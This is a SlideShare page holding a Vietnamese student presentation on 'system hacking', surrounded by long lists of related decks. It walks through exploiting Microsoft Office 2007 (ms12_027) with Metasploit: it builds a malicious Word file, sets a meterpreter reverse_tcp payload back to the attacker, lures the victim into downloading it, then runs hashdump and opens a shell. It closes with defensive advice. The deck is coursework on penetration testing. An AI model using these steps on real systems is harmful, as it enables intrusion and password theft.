SlideShare a Scribd company logo

Bao cao

Download as PPTX, PDF
Nguyễn Minh Tiến
Nguyễn Minh Tiến
1 of 22
Đề tài: System Hacking Sinh viên: Trần Văn Vịnh Nguyễn Minh Tiến GVHDTT : Võ Đỗ Thắng
Nội dung • 1. Giới thiệu về System Hacking, Metasploit và cách sử dụng Metasploit Framework. • 2. Khai thác lỗi Microsoft Office 2007, mã lỗi ms12_027. • 3. Khai thác lỗi Adobe Reader 9 trên WinXP. (Demo video) • 4. Tấn công WinXP sử dụng lỗi Internet Explorer, mã lỗi ms12_004. (Demo code) • 5. Các phương pháp bảo mật, phòng tránh System Hacking.
I. Giới thiệu System Hacking, metasploit framework 1. Giới thiệu system hacking System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log file hệ thống. 2. Giới thiệu về MSF(metasploit framework) MSF là một framework mã nguồn mở, được phát triển với mục đích cung cấp các thông tin về các lỗ hổng bảo mật, hỗ trợ để thử nghiệm các xâm nhập hệ thống (penetration testing: pen-testing ). Ban đầu MSF được viết bằng ngôn ngữ Perl, nhưng từ phiên bản 3.0 trở đi MSF được viết lại toàn bộ bằng Ruby, và được bổ sung thêm các công cụ khác trong nghiên cứu bảo mật như các công cụ thu thập thông tin, fuzzing, scanner ..
II. Sử dụng Metasploit Framework 1) Chọn module exploit Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác - show exploits: xem các module exploit mà framework có hỗ trợ - use exploit_name: chọn module exploit - info exploit_name: xem thông tin về module exploit 2) Cấu hình module exploit đã chọn - show options: Xác định những options nào cần cấu hình - set : cấu hình cho những option của module đó Một vài module còn có những advanced options, chúng ta có thể xem bằng cách gõ dòng lệnh show advanceds 3) Verify những options vừa cấu hình - check: kiểm tra xem những option đã được set chính xác chưa.
4) Lựa chọn payload Payload là đoạn code mà sẽ chạy trên hệ thống remote machine, là một phần của virus máy tính để thực thi mã độc. - show payloads: liệt kê ra những payload của module exploit hiện tại - info payload_name: xem thông tin chi tiết về payload đó - set payload payload_name: xác định payload module name.Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó - show advanced: xem những advanced options của payload đó 5) Thực thi exploit - exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho chúng ta những thông tin về hệ thống được khai thác II. Sử dụng Metasploit Framework
III. Khai thác lỗi Microsoft Office 2007, ms12_027 - Vào Terminal, gõ msfconsole và Enter:
Để dùng mã lỗi ms12-027: search ms12-027 và enter III. Khai thác lỗi Microsoft Office 2007, ms12_027
Ta gõ tiếp: use exploit/windows/fileformat/ms12_027_mscomctl_bof và enter III. Khai thác lỗi Microsoft Office 2007, ms12_027
- set PAYLOAD windows/meterpreter/reverse_tcp III. Khai thác lỗi Microsoft Office 2007, ms12_027
Dùng lệnh: show options để xem các tham số cần thiết để có thể tiến hành tấn công được: III. Khai thác lỗi Microsoft Office 2007, ms12_027
III. Khai thác lỗi Microsoft Office 2007, ms12_027 Set filename : tên file word chứa mã đôc. Set lhost: IP của máy tấn công. Exploit : thực thi.
Copy file word chứa mã độc vào /var/www để máy victeam có thể download về. III. Khai thác lỗi Microsoft Office 2007, ms12_027
/ect/init.d/apache2 start : khởi động máy chủ ảo. III. Khai thác lỗi Microsoft Office 2007, ms12_027
- use exploit/multi/handler - Set lại lhost và payload. - exploit để bắt đầu khởi động server. III. Khai thác lỗi Microsoft Office 2007, ms12_027
- Tại máy victeam ta truy cập vào địa chỉ của máy tấn công để downlad file word chứa mã độc về. - Sau đó mở file word đó lên. III. Khai thác lỗi Microsoft Office 2007, ms12_027
Đợi một lát, trên máy tính tấn công ta được: III. Khai thác lỗi Microsoft Office 2007, ms12_027
- Để tương tác với 1 session nào đó ta thực hiện: sessions –i 1 (1 là id của sessions) - Bây giờ thì mọi việc đã trở nên dễ dàng hơn, khi kẻ tấn công đã điều khiển được máy nạn nhân với toàn quyền. Ví dụ: - Lệnh sysinfo để lấy thông tin của máy nạn nhân: - Lệnh hashdump để lấy mật khẩu của người dùng dưới dạng hash - Chúng ta có thể xem tất cả các lệnh hỗ trợ bằng lênh: help III. Khai thác lỗi Microsoft Office 2007, ms12_027
Lệnh rất hữu ích để sử dụng cmd (command-line): shell III. Khai thác lỗi Microsoft Office 2007, ms12_027
IV. Khai thác lỗi Adobe Reader Video demo: https://www.youtube.com/watch?v=xRgq7cZgCwo&feature=youtu.be
V. Khai thác lỗi Internet Explorer, ms12_004 Demo code
VI. Các phương pháp bảo mật, phòng tránh System Hacking. • Cài đặt phần mềm diệt virut Internet Security. • Thường xuyên cập nhật các bản vá lỗi của Microsofts, Windows để tránh bị hacker lợi dụng. • Luôn sử dụng các bản Office có bản quyền để luôn được cập nhật vá lỗi và hỗ trợ kỹ thuật từ nhà cung cấp. • Không nên mở các file Word, PDF, Link liên kết lạ… từ email không rõ nguồn gốc.
CÁM ƠN THẦY VÀ CÁC BẠN ĐÃ LẮNG NGHE

Recommended

Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcLoc Tran
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System HackingHuynh Khang
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploitchungdv
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Bao cao tuan 1
Bao cao tuan 1Bao cao tuan 1
Bao cao tuan 1Seavar Neuvell
 
Bao cao tuan 1
Bao cao tuan 1Bao cao tuan 1
Bao cao tuan 1Seavar Neuvell
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 

Recommended

Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcLoc Tran
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System HackingHuynh Khang
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploitchungdv
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Bao cao tuan 1
Bao cao tuan 1Bao cao tuan 1
Bao cao tuan 1Seavar Neuvell
 
Bao cao tuan 1
Bao cao tuan 1Bao cao tuan 1
Bao cao tuan 1Seavar Neuvell
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Bai giang bai13
Bai giang bai13Bai giang bai13
Bai giang bai13huyphamthinhu
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hackingHuynh Khang
 
BÀI 13: MỘT SỐ HỆ ĐIỀU HÀNH THÔNG DỤNG
BÀI 13: MỘT SỐ HỆ ĐIỀU HÀNH THÔNG DỤNGBÀI 13: MỘT SỐ HỆ ĐIỀU HÀNH THÔNG DỤNG
BÀI 13: MỘT SỐ HỆ ĐIỀU HÀNH THÔNG DỤNGTrần Nhân
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareNguyen Stone
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaÂu Dương Bình
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)Huy Tiến
 
Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2Âu Dương Bình
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxLê Lãnh
 
Bao caocuoiki
Bao caocuoikiBao caocuoiki
Bao caocuoikiNguyễn Minh Tiến
 
Bai 12 giao tiep voi he dieu hanh
Bai 12 giao tiep voi he dieu hanhBai 12 giao tiep voi he dieu hanh
Bai 12 giao tiep voi he dieu hanhBich Tuyen
 
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPTBài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPTMasterCode.vn
 
Giới thiệu về Windows 8
Giới thiệu về Windows 8Giới thiệu về Windows 8
Giới thiệu về Windows 8Duy Lùn
 
Bài 10: Khái niệm về hệ điều hành
Bài 10: Khái niệm về hệ điều hànhBài 10: Khái niệm về hệ điều hành
Bài 10: Khái niệm về hệ điều hànhChâu Trần
 
Pham Van Giang - Lop 10 - Chuong 2 - Bai 12
Pham Van Giang - Lop 10 - Chuong 2 - Bai 12Pham Van Giang - Lop 10 - Chuong 2 - Bai 12
Pham Van Giang - Lop 10 - Chuong 2 - Bai 12Giang Văn
 
Bai 10 khai niem he dieu hanh
Bai 10 khai niem he dieu hanhBai 10 khai niem he dieu hanh
Bai 10 khai niem he dieu hanhquangaxa
 
Những lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNhững lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNgoc Dao
 
Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingv7q3t
 
BÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNH
BÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNHBÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNH
BÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNHTrần Nhân
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaCon Ranh
 
Beezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo
 
System Hacking
System HackingSystem Hacking
System HackingTrí Huỳnh
 
System hacking
System hackingSystem hacking
System hackingPhuong Ngo
 

More Related Content

What's hot

Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hackingHuynh Khang
 
BÀI 13: MỘT SỐ HỆ ĐIỀU HÀNH THÔNG DỤNG
BÀI 13: MỘT SỐ HỆ ĐIỀU HÀNH THÔNG DỤNGBÀI 13: MỘT SỐ HỆ ĐIỀU HÀNH THÔNG DỤNG
BÀI 13: MỘT SỐ HỆ ĐIỀU HÀNH THÔNG DỤNGTrần Nhân
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareNguyen Stone
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaÂu Dương Bình
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)Huy Tiến
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxLê Lãnh
 
Bai 12 giao tiep voi he dieu hanh
Bai 12 giao tiep voi he dieu hanhBai 12 giao tiep voi he dieu hanh
Bai 12 giao tiep voi he dieu hanhBich Tuyen
 
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPTBài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPTMasterCode.vn
 
Giới thiệu về Windows 8
Giới thiệu về Windows 8Giới thiệu về Windows 8
Giới thiệu về Windows 8Duy Lùn
 
Bài 10: Khái niệm về hệ điều hành
Bài 10: Khái niệm về hệ điều hànhBài 10: Khái niệm về hệ điều hành
Bài 10: Khái niệm về hệ điều hànhChâu Trần
 
Pham Van Giang - Lop 10 - Chuong 2 - Bai 12
Pham Van Giang - Lop 10 - Chuong 2 - Bai 12Pham Van Giang - Lop 10 - Chuong 2 - Bai 12
Pham Van Giang - Lop 10 - Chuong 2 - Bai 12Giang Văn
 
Bai 10 khai niem he dieu hanh
Bai 10 khai niem he dieu hanhBai 10 khai niem he dieu hanh
Bai 10 khai niem he dieu hanhquangaxa
 
Những lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNhững lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNgoc Dao
 
Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingv7q3t
 
BÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNH
BÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNHBÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNH
BÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNHTrần Nhân
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaCon Ranh
 
Beezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo
 

What's hot (20)

Bai giang bai13
Bai giang bai13Bai giang bai13
Bai giang bai13
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
 
BÀI 13: MỘT SỐ HỆ ĐIỀU HÀNH THÔNG DỤNG
BÀI 13: MỘT SỐ HỆ ĐIỀU HÀNH THÔNG DỤNGBÀI 13: MỘT SỐ HỆ ĐIỀU HÀNH THÔNG DỤNG
BÀI 13: MỘT SỐ HỆ ĐIỀU HÀNH THÔNG DỤNG
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMware
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)
 
Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
 
Bao caocuoiki
Bao caocuoikiBao caocuoiki
Bao caocuoiki
 
Bai 12 giao tiep voi he dieu hanh
Bai 12 giao tiep voi he dieu hanhBai 12 giao tiep voi he dieu hanh
Bai 12 giao tiep voi he dieu hanh
 
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPTBài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
 
Giới thiệu về Windows 8
Giới thiệu về Windows 8Giới thiệu về Windows 8
Giới thiệu về Windows 8
 
Bài 10: Khái niệm về hệ điều hành
Bài 10: Khái niệm về hệ điều hànhBài 10: Khái niệm về hệ điều hành
Bài 10: Khái niệm về hệ điều hành
 
Pham Van Giang - Lop 10 - Chuong 2 - Bai 12
Pham Van Giang - Lop 10 - Chuong 2 - Bai 12Pham Van Giang - Lop 10 - Chuong 2 - Bai 12
Pham Van Giang - Lop 10 - Chuong 2 - Bai 12
 
Bai 10 khai niem he dieu hanh
Bai 10 khai niem he dieu hanhBai 10 khai niem he dieu hanh
Bai 10 khai niem he dieu hanh
 
Những lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNhững lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần application
 
Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hacking
 
BÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNH
BÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNHBÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNH
BÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNH
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athena
 
Beezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke Deserialize
 

Viewers also liked

System hacking
System hackingSystem hacking
System hackingPhuong Ngo
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tapPhuong Ngo
 
de an system hacking
de an system hacking de an system hacking
de an system hacking Anh Bình
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng PhongPhong Hoang
 
Báo cáo System hacking
Báo cáo System hackingBáo cáo System hacking
Báo cáo System hackingHuynh Khang
 
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬPBÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬPphanconghien
 
Monitor theo doi_benh_nhan
Monitor theo doi_benh_nhanMonitor theo doi_benh_nhan
Monitor theo doi_benh_nhanLệnh Xung
 
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...Danh Tran
 
Báo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳBáo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳthanhthong1210
 
chứng khoán việt nam 2000-nay
chứng khoán việt nam 2000-naychứng khoán việt nam 2000-nay
chứng khoán việt nam 2000-nayKhanh Nhi Nguyen
 
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmpgiai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmpPham Huynh
 
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lanNghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lanleokidd
 
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚBáo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚCon Ranh
 
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web application
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web applicationCông cụ và phương pháp phát hiện lỗ hổng bảo mật web application
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web applicationducmanhkthd
 
tìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậttìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậtanhkhoa2222
 

Viewers also liked (16)

System Hacking
System HackingSystem Hacking
System Hacking
 
System hacking
System hackingSystem hacking
System hacking
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
de an system hacking
de an system hacking de an system hacking
de an system hacking
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong
 
Báo cáo System hacking
Báo cáo System hackingBáo cáo System hacking
Báo cáo System hacking
 
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬPBÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
 
Monitor theo doi_benh_nhan
Monitor theo doi_benh_nhanMonitor theo doi_benh_nhan
Monitor theo doi_benh_nhan
 
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
 
Báo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳBáo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳ
 
chứng khoán việt nam 2000-nay
chứng khoán việt nam 2000-naychứng khoán việt nam 2000-nay
chứng khoán việt nam 2000-nay
 
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmpgiai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
 
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lanNghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
 
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚBáo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
 
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web application
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web applicationCông cụ và phương pháp phát hiện lỗ hổng bảo mật web application
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web application
 
tìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậttìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mật
 

Similar to Bao cao

cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploitLê Lãnh
 
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýQuý Đồng Nast
 
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTBài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTMasterCode.vn
 
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýQuý Đồng Nast
 
ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3VNG
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1Anhh Hữu
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctapLong Prồ
 
Linux web hosting (Thuyet trinh)
Linux web hosting (Thuyet trinh)Linux web hosting (Thuyet trinh)
Linux web hosting (Thuyet trinh)An Pham
 
Linux web hosting (Thuyet trinh)
Linux web hosting (Thuyet trinh)Linux web hosting (Thuyet trinh)
Linux web hosting (Thuyet trinh)An Pham
 
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015 cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015laonap166
 
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019hanhha12
 
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu nataliej4
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2Con Ranh
 
SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1Con Ranh
 

Similar to Bao cao (20)

cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploit
 
Metasploit
MetasploitMetasploit
Metasploit
 
Bai bao cao 3
Bai bao cao 3Bai bao cao 3
Bai bao cao 3
 
Tuan5
Tuan5Tuan5
Tuan5
 
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
 
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTBài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
 
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
 
Ceh phan3
Ceh phan3Ceh phan3
Ceh phan3
 
ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctap
 
Linux web hosting (Thuyet trinh)
Linux web hosting (Thuyet trinh)Linux web hosting (Thuyet trinh)
Linux web hosting (Thuyet trinh)
 
Linux web hosting (Thuyet trinh)
Linux web hosting (Thuyet trinh)Linux web hosting (Thuyet trinh)
Linux web hosting (Thuyet trinh)
 
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
